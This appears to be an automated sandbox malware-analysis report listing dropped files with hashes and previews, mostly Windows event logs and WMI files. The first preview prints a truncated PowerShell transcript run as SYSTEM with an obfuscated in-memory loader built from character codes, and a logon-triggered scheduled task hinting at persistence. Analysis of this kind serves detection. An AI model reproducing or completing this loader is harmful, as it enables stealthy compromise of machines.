SSDEEP:	192:NIvawYQo0dZcT2IUwB2IvawYQo0dZcT2IUwBS:NIvpYl0oD2IvpYl0oDS
MD5:	5AD398834C8E25723975DED4B2D02597
SHA1:	5EA89BAD95268DA60FF5123220E5C6E9592605B4
SHA-256:	A7E6F5069C4185EC5523D5951C49C9034A91ACC6F367B022A52CB72424CE0558
SHA-512:	981A90B488F64FBB54CCE44BE5A8361CEE66696D46DA6145DD99BFD5D7D9656D095DAB58EB8CB9BB1BD28C4C95917A9872B66D08E568CF2977603536EA10F659
Malicious:	false
Preview:	.**********************..Windows PowerShell transcript start..Start time: 20241004034312..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](10

C:\Windows\System32\Tasks\$rbx-QgS1M4PT

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3488
Entropy (8bit):	3.5872466257032647
Encrypted:	false
SSDEEP:	48:yei1q97SfeQn1ab9o9V9Lvara+i3iusupRCRvA9ufAuRa7G5XhPsbN1jANg8iJXI:t2nkp2Gdi3ipVA9ll7EhAMz3cHtr+
MD5:	3D2655B2FBBD4D24033DBB79B921697C
SHA1:	08CE2A84327E1EEF614008809F15A9F126B28A05
SHA-256:	2CFED75D94EC6FC435D61F370CCA3D40E910A8FB10A97D45D51FFEE0F87A7793
SHA-512:	F261B1727096BBF17F97402A5F7D19C46F5481227E50AD43294C935C13CBB6494F1DD068E2FA5DC26F10926600D2E17289C44785518936C69A5A7670A0D68182
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.0.-.0.4.T.0.4.:.0.1.:.4.7...9.8.9.-.0.4.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.r.b.x.-.Q.g.S.1.M.4.P.T.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul4/h:NllU
MD5:	C31A1BA17DD8856E8E930807FA308CBE
SHA1:	96AAFF7B013066D2EDA2958128FD049915028849
SHA-256:	91620CED47374C83D43981E1930EF7C78B6E7651F108F6CB18A60CAE8487E1CF
SHA-512:	6D6AB14A905EC859D23B2C2BA163A144FB35162AA05CFF85478291C0562085B8569A706B2A7A28CA97C958BE2FC3840CEBA99D212CB317CD5176784B194DAA59
Malicious:	false
Preview:	@...e................................."..............@..........

C:\Windows\System32\wbem\Performance\WmiApRpl_new.h

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3444
Entropy (8bit):	5.011954215267298
Encrypted:	false
SSDEEP:	48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
MD5:	B133A676D139032A27DE3D9619E70091
SHA1:	1248AA89938A13640252A79113930EDE2F26F1FA
SHA-256:	AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
SHA-512:	C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
Malicious:	false
Preview:	//////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	950
Entropy (8bit):	2.8937402169492104
Encrypted:	false
SSDEEP:	12:Q1NXCaAGaCGopGGD1JTi0SMfmCwOx6ivzivG:Q3wU/IM1x6ozoG
MD5:	9D007E669CE25371EE9401DC2AC21D2A
SHA1:	6F0CACCD76F7A94BBCB1124D398E9139E09C6FC4
SHA-256:	632004D14715476801408FC10E1B119BDC90378D2E8D573B7C14A06816799FA8
SHA-512:	AB9FEA61D8C00701E402D700873CA2B9A4FFB7D62557A2ED1C86571DCC40D3C33F7B7E358DF506C134EE4ABEE39B1167846C64A34FA19448FD1DC36AF19F579C
Malicious:	false
Preview:	.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........

C:\Windows\System32\winevt\Logs\Application.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	78200
Entropy (8bit):	4.069487817829082
Encrypted:	false
SSDEEP:	768:4k3WxWwWLvOUZucxvbNp8CCcicolb/AjQwEPnPK0xvFk3WxWwW8:dLkctNp8TcG/Ajs7C8
MD5:	35F5E61B44C99E5961D791D65DD17821
SHA1:	EEECB77D0C11E84E03F3A3D8D32DA60B0C425431
SHA-256:	B6B776F4A27841D857B1CC867F758A0616F9774142F2A55DDB3A2440934D6BA3
SHA-512:	69772C98E379465695ED3970FF245780716E8EB877E4B7211A731953777555A7F40402DAFB05B541C53508CB3411C60C3F95EB1025E177A3D249BEF5CD15BDEF
Malicious:	false
Preview:	ElfChnk.................r.......w...............@.............................................................................(.............$...............................=...................................................................................K.......$...............................m...............F...........................t...................M...c...........................n.......................................................................................&...............................**......v........B..1............g&.....................................................................................!...d..............B..1...........v..............w.)Cn...................p.o.w.e.r.s.h.e.l.l...e.x.e...1.0...0...1.9.0.4.1...5.4.6...7.e.d.a.4.1.1.5...u.n.k.n.o.w.n...0...0...0...0...0.0.0.0.0.0.0.0...0.0.0.0.0.0.0.0...0.0.0.0.7.f.f.d.9.b.b.d.1.c.6.3...1.2.d.c...0.1.d.b.1.6.3.1.0.7.6.1.1.4.d.f...C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l

C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.2559303785119753
Encrypted:	false
SSDEEP:	384:8he6UHi2uepX7xasnPC3FzFtpFDhFPFyF8422:8VUHiapX7xadptrDT9W84N
MD5:	8EF6E9746DE72295DFCB3197A49966C3
SHA1:	3FF34508B83382569DF87C14DDFF8596D1E29980
SHA-256:	BEBF782FCDAD337843593DEE32D030C922424367A50078E30329BE63259E648A
SHA-512:	0F0690586ACE4A7D37D948805FD2464D8ED5A1B42CE42F68F607072B5836B7CB2032F468FC1C1E921C8FB097694DDD3BE2821D193B73E5552A45F253816DB513
Malicious:	false
Preview:	ElfChnk.........4...............4....................?........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.010692427789071
Encrypted:	false
SSDEEP:	384:GhLNzhNCjN0QNGNgN7NxEN5N0RN0zN0mN0RN00N0oN0xN0qNeN0NN0UN0lN09N0Q:GnqqIJMa/Mh9sUwBYAJGUarGlEwxV
MD5:	26C4C5213F3C6B727417EF07207AC1E0
SHA1:	1815CC405C8B70939C252390E2A1AEC87EFF45F2
SHA-256:	767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
SHA-512:	0355BBF16EB471698F47189031E8E18306D8F748E6CC5328C33301BEAAE435647532B24F5EC42A94B92390C19E60D11846B412C6747DC82DC98999E649607B65
Malicious:	false
Preview:	ElfChnk.%.......J.......%.......J............b..Pe.....:....................................................................&...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........].......M...............................VY..................................**......%........0................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.178919462156868
Encrypted:	false
SSDEEP:	384:ohfVaVtVbVHVyV5V+VSVBVNVEVrVBVeVPVpVCVigVgVpVeVNVkVUVAVJVgV6VdVF:ohfKm3t
MD5:	EE25A9478FAB4FBAB6D89F9F2E7C7EF4
SHA1:	643403023901E8CB6CB7AE3269A883C2BA3CC4C7
SHA-256:	699618BC087165CE1AC1F7BE088642E80AA920F351D74DDD3454FA2BFA37C374
SHA-512:	A13D249D057F6899FB8074B01AEB5A367CC0F36664E4CE479D0EB61A6823ADBBED0D44ADECE4BAE7F5E82AA34B31C02A6E4F3D89827809B39089064F09D01AD9
Malicious:	false
Preview:	ElfChnk...............................................}E....................................................................<..N................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**.. .............k...............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.428104610855212
Encrypted:	false
SSDEEP:	384:UhTm5mcdmNQDmomTDDr0moOm3OPlfmMsgJm5mnmYmcmum/mqmlmtmumbsmbmvMmk:UBdD6CL49mVpgwQFQ
MD5:	D6AA1FCD43790A397134C5CFC5A86D46
SHA1:	3F8C5749681331F3316BAEE46632ECDA80712CED
SHA-256:	C3DA75ABD049DCEDF544ED37E2F12F71ACF2B6C7B0E4E8B13209415F831D266A
SHA-512:	50872703EC944464CFC5B52813E5AEEB9DA101037C1C641A872F311750DE47DD04885DA3856E30030C2CAA5D5DE2A1CABD290B80CAFAD986C87A9CA8501A152E
Malicious:	false
Preview:	ElfChnk..!.......!.......!.......!....................=......................................................................./U................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................#...............&...................................**.......!......o.T..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.3524106147187157
Encrypted:	false
SSDEEP:	48:MiEWNWwrP+AQNRBEZWTENO4bnB+zMgq+ckH58ykH5bOTLHywdHLP7jM0MckH58yj:SNVaO8sMa3Z85ZMLtrjja3Z85Zu
MD5:	C665BB87978EBBDC71354545579E80C0
SHA1:	CC7F6C571B7198162112AF051CDD8B88FF24A626
SHA-256:	DBBA0D6AEE8D46D3D7EDE566ED4EB6356B8C9D914258DE3B7C8BDECDF2C13325
SHA-512:	1EE6B50575CDEDCACFF2F3BA500ECD9AA1F898AA04DF792F80CF6BECF6BB9C7905A63D28EEB9E54E1BBAC7EEF564E517112D6DF538E068A1144D516176EA0252
Malicious:	false
Preview:	ElfChnk.....................................p.......=..J....................................................................SOq.............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.014860518194814
Encrypted:	false
SSDEEP:	1536:xbBN2A4VD7VAx8whAGU2woJQghcI5oIRA4Hw:
MD5:	4FB8E2CF8B3F20534836684947962DC2
SHA1:	B263607E627C81DA77DB65DF5AED2F3FD84B83E2
SHA-256:	DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
SHA-512:	D982DB741A044E222D567712FB4799FF6524A1D451C3D2EE3DF7EB17031AD20EF4EC7098BCFB3E2B00C929EB6569C858EFCF275B28240425E4BF8D994AED9053
Malicious:	false
Preview:	ElfChnk.........V...............V...................0q....................................................................... I............................................=...................................................................................%.......................................X...............?...............................................M...F...................................................................................................................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.15655690871689
Encrypted:	false
SSDEEP:	768:SPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9tFk6dd3s:eXY5nVYIyyqED5BVZUeouPZ
MD5:	2DE60575CB719BF51FAB8A63F696B052
SHA1:	BD44E6B92412898F185D5565865FEA3778573578
SHA-256:	7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
SHA-512:	0471E7824795996992E736F33FEA7AF70EA909804DE3AC59EE76B5D0403901A5147558256C3AAE87BA8F1747D151DE63134661BEB9F6E0FF25AB0E3E89BC6B4A
Malicious:	false
Preview:	ElfChnk.........o...............o..........................................................................................._..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	72208
Entropy (8bit):	2.2541241390870326
Encrypted:	false
SSDEEP:	384:+oroay5oQoay/oioaykoBoay+o/Doay9hdo69CcoTorNorWorbvorTorZorQorNd:dmDCYdAruMx
MD5:	EE1D987C758D86C483BAFBEA2EDEACFA
SHA1:	AED9B378A9200B09637BE24A9ED6F85E3E632EE6
SHA-256:	2D7FB5C71035E8C85B1B98772FAC93D8F72E49853A5D68D1CE2F41E7B8EA5466
SHA-512:	32337026938236CA9078FFE22989E307933986910680B0AEDA0432AECF5AE7EB2237901E09A2E4E3772020F9DE6C30FCB0B7B0F4BF10FCA0C954D6AD102E1700
Malicious:	false
Preview:	ElfChnk.........)...............)...........Hb...d.............................................................................................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/...........$..U)..............................**...... ...........1..............$..............................................................>.......V...7.!..o..................1.....&O......'O....P....... ....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...be.`=/..................l...............K.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8524226245257144
Encrypted:	false
SSDEEP:	384:JhAiPA5PNPxPEPHPhPEPmPSPRP3PoPpPTP8PXPr5P:J2Nr
MD5:	B8E105CC52B7107E2757421373CBA144
SHA1:	39B61BEA2065C4FBEC143881220B37F3BA50A372
SHA-256:	B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
SHA-512:	7670455904F14DA7A9EEFBAD5616D6D00EA262C979EDABB433182500B6EF918C6E534C94DF30D829016C8539DF12CAD5F53EC884C45AA71ACA35CF9B797361BC
Malicious:	false
Preview:	ElfChnk......................................#...&...l2.......................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................#..........'.......................**..x.............\|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8432997252442703
Encrypted:	false
SSDEEP:	384:4hZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+l9:4WXSYieD+tvgzmMvRpBWfb
MD5:	39EE3557626C7F112A88A4DE12E904C1
SHA1:	C307FECC944D746A49EEA6451B7DA7301F03504C
SHA-256:	2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
SHA-512:	304C866E246B3F63BF126B33AED784913A078D44913FD987D896D2D960578B61BA7E24BA3CB8FC76608AB1E5702D0FE587A5FB8C38CDF8913D60F88B1435A2D9
Malicious:	false
Preview:	ElfChnk......................................"...&.....k.....................................................................n..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................."..................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.9958304436685177
Encrypted:	false
SSDEEP:	384:ghqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28g:gbCyhLfIXBS50G
MD5:	139666E45F01B24FAF6F0BBD3C472C73
SHA1:	FFA815ED1A88F4E54C2DECE84DD0427E74D23AB1
SHA-256:	679A66239AE8631182914EFA619C38FA70FBE8D2119303D56039FE0D23BB32ED
SHA-512:	92A4FA069765BC44125B489A7BF8E4B37EB1EBA6B0F3F2F49B151CDEA67B6DA6F06FB412C5A1CB74F93CBFBBB406D945A61E39AABD1BAC416616ADB78FC51B1D
Malicious:	false
Preview:	ElfChnk.........H...............H...........@........[......................................................................KV.................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n...................................................6...................................*..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.838106263184782
Encrypted:	false
SSDEEP:	768:ccMhFBuyKskZljdoKXjtT/r18rQXn8r3e5POH:JMhFBuVge
MD5:	A2D41740C1BAF781019F282E37288DDF
SHA1:	A6FE635B3EC8A6923EDE10C23FC79DD32EF4F621
SHA-256:	7008D3010B17C0B09643D10D26B19FB971BB1963C414C1466BEAD617CF9F15E7
SHA-512:	E33A0A2F9473D2D05E9704FE16E6EE34FB51FD8E25A3D60E1F7A67665CA14421B6511D896526AFC7CAE1BF629BB7013FA10663620C5450F1BB51A465EF5A51CB
Malicious:	false
Preview:	ElfChnk.........?...............?...................<.md.....................................................................?.Q................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A......&...................................**..x...........,.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.634418630947688
Encrypted:	false
SSDEEP:	768:/VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaUeI36ISKEeKRe:cH
MD5:	A00BAFFCABB00428EA0512FCECCC55E5
SHA1:	19F7C942DC26C3FF56D6240158734AFF67D6B93E
SHA-256:	92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
SHA-512:	DF94AA8FA0610A0EFE7BAC0DB2A01645A4CD1C7FAD62E914EF914B526B651ED62600F63909D26149FD17C259348DADE05F48759B1DF092970251DB86690CC2B6
Malicious:	false
